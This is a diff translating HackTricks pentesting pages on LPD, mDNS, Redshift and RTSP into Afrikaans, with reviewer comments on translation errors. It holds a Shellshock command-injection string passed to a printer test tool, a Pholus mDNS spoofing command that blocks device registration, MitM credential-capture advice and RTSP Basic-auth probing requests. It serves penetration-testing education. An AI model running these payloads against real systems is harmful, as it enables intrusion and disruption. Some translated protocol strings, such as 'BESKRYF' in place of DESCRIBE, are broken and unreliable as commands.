+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
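Review bot: the line `+Dit is 'n diens wat jou toelaat om 'n bevel binne 'n gasheer uit te voer as jy geldige **legitimasie** (gebruikersnaam en wagwoord) weet.` drops the bold that the removed line carried on "allows you to execute a command inside a host", and the blank line that separated that paragraph from `**Default Port:** 512` is deleted, so `+**Verstekpoort:** 512` now continues the previous paragraph in rendered Markdown instead of standing on its own line. Restore the emphasis (`**laat jou toe om 'n bevel binne 'n gasheer uit te voer**`) and re-insert the blank line before `**Verstekpoort:** 512`. Also `legitimasie` for "credentials" differs from `geloofsbriewe`, which this same patch uses in 5353-udp-multicast-dns-mdns.md and 554-8554-pentesting-rtsp.md.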
diff --git a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 477b7d240..397f0c918 100644 --- a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -1,27 +1,24 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-### **Introduction to LPD Protocol** +### **Inleiding tot die LPD-protokol** -In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. +In die 1980's is die **Line Printer Daemon (LPD) protokol** ontwikkel in Berkeley Unix, wat later geformaliseer is deur RFC1179. Hierdie protokol werk oor poort 515/tcp en maak interaksies moontlik deur die `lpr`-opdrag. Die essensie van drukwerk via LPD behels die stuur van 'n **beheerlêer** (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n **data-lêer** (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van **verskeie lêerformate** vir die data-lêer moontlik maak, word die hantering van hierdie lêers bepaal deur die spesifieke LPD-implementering. 'n Wyd erkenning implementering vir Unix-soortgelyke stelsels is **LPRng**. Merkwaardig kan die LPD-protokol uitgebuit word om **skadelike PostScript** of **PJL-drukwerkopdragte** uit te voer. -### **Tools for Interacting with LPD Printers** - -[**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. 
These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: +### **Hulpmiddels vir interaksie met LPD-drukkers** +[**PRET**](https://github.com/RUB-NDS/PRET) stel twee essensiële hulpmiddels bekend, `lpdprint` en `lpdtest`, wat 'n eenvoudige metode bied om met LPD-verenigbare drukkers te interaksieer. Hierdie hulpmiddels maak 'n verskeidenheid aksies moontlik, van die druk van data tot die manipulering van lêers op die drukker, soos aflaai, oplaai of verwyder: ```python # To print a file to an LPD printer lpdprint.py hostname filename @@ -36,26 +33,23 @@ lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' # To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` - -For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). +Vir individue wat belangstel om die wêreld van **drukkerhacking** verder te verken, kan 'n omvattende bron hier gevind word: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). # Shodan -* `port 515` +* `poort 515`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
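Review bot: `+* \`poort 515\`` translates a Shodan query; `port` is a Shodan filter keyword, so the translated line no longer works when pasted into Shodan. Keep `* \`port 515\`` verbatim. The same rule applies to protocol literals elsewhere in this patch, for example the RTSP `DESCRIBE` method rendered as `BESKRYF` in 554-8554-pentesting-rtsp.md, which is not an RTSP method name. In the first hunk of this file, `'n Wyd erkenning implementering` is ungrammatical and should read `'n Wyd erkende implementering`, and `te interaksieer` should be `interaksie te hê` or `te kommunikeer`. The `lpdprint.py` and `lpdtest.py` command block and the Hacking Printers URL are correctly left unchanged.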
- - diff --git a/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md index 1939f4c36..14bb92b76 100644 --- a/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -1,94 +1,86 @@ -# 5353/UDP Multicast DNS (mDNS) and DNS-SD +# 5353/UDP Multicast DNS (mDNS) en DNS-SD
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** - -**Multicast DNS (mDNS)** enables **DNS-like operations** within local networks without needing a traditional DNS server. It operates on **UDP port 5353** and allows devices to discover each other and their services, commonly seen in various IoT devices. **DNS Service Discovery (DNS-SD)**, often used alongside mDNS, aids in identifying services available on the network through standard DNS queries. +## **Basiese Inligting** +**Multicast DNS (mDNS)** maak **DNS-agtige operasies** binne plaaslike netwerke moontlik sonder 'n tradisionele DNS-bediener. Dit werk op **UDP-poort 5353** en stel toestelle in staat om mekaar en hul dienste te ontdek, wat dikwels gesien word in verskeie IoT-toestelle. **DNS Service Discovery (DNS-SD)**, dikwels saam met mDNS gebruik, help om dienste wat beskikbaar is op die netwerk te identifiseer deur middel van standaard DNS-navrae. ``` PORT STATE SERVICE 5353/udp open zeroconf ``` +### **Operasie van mDNS** -### **Operation of mDNS** +In omgewings sonder 'n standaard DNS-bediener, maak mDNS dit moontlik vir toestelle om domeinname wat eindig met **.local** op te los deur die multicast-adres **224.0.0.251** (IPv4) of **FF02::FB** (IPv6) te ondervra. Belangrike aspekte van mDNS sluit 'n **Tyd-tot-Leef (TTL)** waarde in wat die geldigheid van rekords aandui en 'n **QU-bit** wat onderskei tussen unicast- en multicast-navrae. Wat sekuriteit betref, is dit noodsaaklik vir mDNS-implementasies om te verseker dat die bronadres van die pakkie ooreenstem met die plaaslike subnet. -In environments without a standard DNS server, mDNS allows devices to resolve domain names ending in **.local** by querying the multicast address **224.0.0.251** (IPv4) or **FF02::FB** (IPv6). Important aspects of mDNS include a **Time-to-Live (TTL)** value indicating record validity and a **QU bit** distinguishing between unicast and multicast queries. 
Security-wise, it's crucial for mDNS implementations to verify that the packet's source address aligns with the local subnet. +### **Funksionering van DNS-SD** -### **Functioning of DNS-SD** +DNS-SD fasiliteer die ontdekking van netwerkdienste deur te ondervra vir aanwysingsrekords (PTR) wat dienssoorte aan hul instansies koppel. Dienste word geïdentifiseer deur 'n **_\.\_tcp of \_\.\_udp** patroon binne die **.local** domein, wat lei tot die ontdekking van ooreenstemmende **SRV** en **TXT-rekords** wat gedetailleerde diensinligting verskaf. -DNS-SD facilitates the discovery of network services by querying for pointer records (PTR) that map service types to their instances. Services are identified using a **_\.\_tcp or \_\.\_udp** pattern within the **.local** domain, leading to the discovery of corresponding **SRV** and **TXT records** which provide detailed service information. +### **Netwerkverkenning** -### **Network Exploration** - -#### **nmap Usage** - -A useful command for scanning the local network for mDNS services is: +#### **nmap Gebruik** +'n Nuttige opdrag vir die skandering van die plaaslike netwerk vir mDNS-dienste is: ```bash nmap -Pn -sUC -p5353 [target IP address] ``` +Hierdie bevel help om oop mDNS-poorte te identifiseer en die dienste wat oor hulle geadverteer word. -This command helps identify open mDNS ports and the services advertised over them. 
- -#### **Network Enumeration with Pholus** - -To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows: +#### **Netwerkopname met Pholus** +Om aktief mDNS-versoeke te stuur en verkeer vas te vang, kan die **Pholus**-instrument as volg gebruik word: ```bash sudo python3 pholus3.py [network interface] -rq -stimeout 10 ``` +## Aanvalle -## Attacks - -### **Exploiting mDNS Probing** - -An attack vector involves sending spoofed responses to mDNS probes, suggesting that all potential names are already in use, thus hindering new devices from selecting a unique name. This can be executed using: +### **Exploitering van mDNS Probing** +'n Aanvalvektor behels die stuur van vervalsde reaksies na mDNS-probes, wat aandui dat alle potensiële name reeds in gebruik is, en sodoende nuwe toestelle verhinder om 'n unieke naam te kies. Dit kan uitgevoer word deur gebruik te maak van: ```bash sudo python pholus.py [network interface] -afre -stimeout 1000 ``` +Hierdie tegniek blokkeer effektief nuwe toestelle om hul dienste op die netwerk te registreer. -This technique effectively blocks new devices from registering their services on the network. - -**In summary**, understanding the workings of mDNS and DNS-SD is crucial for network management and security. Tools like **nmap** and **Pholus** offer valuable insights into local network services, while awareness of potential vulnerabilities helps in safeguarding against attacks. +**Opsomming**: Dit is noodsaaklik om die werking van mDNS en DNS-SD te verstaan vir netwerkbestuur en -veiligheid. Gereedskap soos **nmap** en **Pholus** bied waardevolle insigte in plaaslike netwerkdienste, terwyl bewustheid van potensiële kwesbaarhede help om teen aanvalle te beskerm. ### Spoofing/MitM -The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. 
You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\ -For more information check: +Die mees interessante aanval wat jy oor hierdie diens kan uitvoer, is om 'n **MitM** in die **kommunikasie tussen die kliënt en die regte bediener** uit te voer. Jy mag dalk gevoelige lêers (MitM die kommunikasie met die drukker) of selfs geloofsbriewe (Windows-verifikasie) verkry.\ +Vir meer inligting, kyk: {% content-ref url="../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) {% endcontent-ref %} -## References +## Verwysings * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
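Review bot: the heading `+### **Exploitering van mDNS Probing**` uses `Exploitering`, which is not an Afrikaans word; `Uitbuiting van mDNS-probing` matches the `uitgebuit` already used for "exploited" in the LPD file of this patch. The same section switches between `bevel` (`Hierdie bevel help om oop mDNS-poorte te identifiseer`) and `opdrag` (`'n Nuttige opdrag vir die skandering`) for "command"; choose one. `Tyd-tot-Leef (TTL)` is better left as `Time-to-Live (TTL)`, since the acronym no longer matches the translated expansion. The `{% content-ref %}` block, the nmap and Pholus command lines and the reference entry are correctly left untranslated.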
diff --git a/network-services-pentesting/5439-pentesting-redshift.md b/network-services-pentesting/5439-pentesting-redshift.md index f843eb956..6095293d4 100644 --- a/network-services-pentesting/5439-pentesting-redshift.md +++ b/network-services-pentesting/5439-pentesting-redshift.md @@ -2,32 +2,32 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic Information +## Basiese Inligting -This port is used by **Redshift** to run. It's basically an AWS variation of **PostgreSQL**. +Hierdie poort word deur **Redshift** gebruik om te loop. Dit is basies 'n AWS-variante van **PostgreSQL**. -For more information check: +Vir meer inligting, kyk na: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
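Review bot: `+Hierdie poort word deur **Redshift** gebruik om te loop. Dit is basies 'n AWS-variante van **PostgreSQL**.` has a number error (`variante` is plural; the sentence needs `'n AWS-variant van **PostgreSQL**`), and `gebruik om te loop` is a word-for-word rendering of "to run"; `Redshift luister op hierdie poort` says what the original means. This file still carries the older banner variant (`Werk jy in 'n **cybersecurity-maatskappy**?`) while the other files in this patch use the `Ander maniere om HackTricks te ondersteun:` banner; since the page is being touched anyway, align it. The `{% embed %}` URL is correctly unchanged.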
diff --git a/network-services-pentesting/554-8554-pentesting-rtsp.md b/network-services-pentesting/554-8554-pentesting-rtsp.md index b226a0e9c..95c725f8b 100644 --- a/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -2,51 +2,48 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol): +Van [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol): -> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). +> Die **Real Time Streaming Protocol** (**RTSP**) is 'n netwerkbeheerprotokol wat ontwerp is vir gebruik in vermaak- en kommunikasiestelsels om streamingmediaserwers te beheer. Die protokol word gebruik om media-sessies tussen eindpunte te vestig en te beheer. Kliënte van mediaserwers gee VHS-styl-opdragte, soos speel, opneem en onderbreek, om die media wat van die bediener na 'n kliënt gestroom word (Video On Demand) of van 'n kliënt na die bediener (Voice Recording) in werklike tyd te beheer. > -> The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol (RTP) in conjunction with Real-time Control Protocol (RTCP) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport (RDT). - -**Default ports:** 554,8554 +> Die oordrag van streamingdata self is nie 'n taak van RTSP nie. Die meeste RTSP-bedieners gebruik die Real-time Transport Protocol (RTP) in samewerking met die Real-time Control Protocol (RTCP) vir die aflewering van mediastroom. Sommige verskaffers implementeer egter eiendomlike vervoerprotokolle. 
Die RTSP-bedienersagteware van RealNetworks gebruik byvoorbeeld ook RealNetworks se eiendomlike Real Data Transport (RDT). +**Verstekpoorte:** 554,8554 ``` PORT STATE SERVICE 554/tcp open rtsp ``` +## Sleutelbesonderhede -## Key Details +**RTSP** is soortgelyk aan HTTP, maar spesifiek ontwerp vir mediastroom. Dit word gedefinieer in 'n eenvoudige spesifikasie wat hier gevind kan word: -**RTSP** is similar to HTTP but designed specifically for media streaming. It's defined in a straightforward specification which can be found here: +[RTSP - RFC2326](https://tools.ietf.org/html/rfc2326) -[RTSP – RFC2326](https://tools.ietf.org/html/rfc2326) +Toestelle kan **ongeagte** of **geagte** toegang toelaat. Om dit te kontroleer, word 'n "BESKRYF" versoek gestuur. 'n Basiese voorbeeld word hieronder getoon: -Devices might allow **unauthenticated** or **authenticated** access. To check, a "DESCRIBE" request is sent. A basic example is shown below: +`BESKRYF rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` -`DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` +Onthou, die korrekte formaat sluit 'n dubbele "\r\n" in vir 'n konsekwente respons. 'n "200 OK" respons dui op **ongeagte toegang**, terwyl "401 Unauthorized" aandui dat daar verifikasie benodig word, wat onthul of **Basiese verifikasie** of **Digest-verifikasie** vereis word. -Remember, the correct formatting includes a double "\r\n" for a consistent response. A "200 OK" response indicates **unauthenticated access**, while "401 Unauthorized" signals the need for authentication, revealing if **Basic** or **Digest authentication** is required. +Vir **Basiese verifikasie**, enkodeer jy die gebruikersnaam en wagwoord in base64 en sluit dit in die versoek in soos volg: -For **Basic authentication**, you encode the username and password in base64 and include it in the request like so: - -`DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n` - -This example uses "admin" and "1234" for the credentials. 
Here's a **Python script** to send such a request: +`BESKRYF rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n` +Hierdie voorbeeld gebruik "admin" en "1234" vir die geloofsbriewe. Hier is 'n **Python-skripsie** om so 'n versoek te stuur: ```python import socket req = "DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n" 
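Review bot: the RTSP method name must not be translated: the two inline request examples in this hunk now read `BESKRYF rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` and `BESKRYF rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n`, but `DESCRIBE` is a protocol token defined in RFC 2326 and a server will reject `BESKRYF`; keep `DESCRIBE` here, as the Python block directly below correctly does, and likewise in the sentence `word 'n "BESKRYF" versoek gestuur`. In the same paragraph "ongeagte"/"geagte" do not mean unauthenticated/authenticated ("ongeag" is "regardless"); "ongeverifieerde"/"geverifieerde" toegang matches the "Basiese verifikasie" wording used a few lines later. Minor: the blank line between `**Verstekpoorte:** 554,8554` and the following code fence was dropped; the rest of the book keeps a blank line on either side of a fence.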
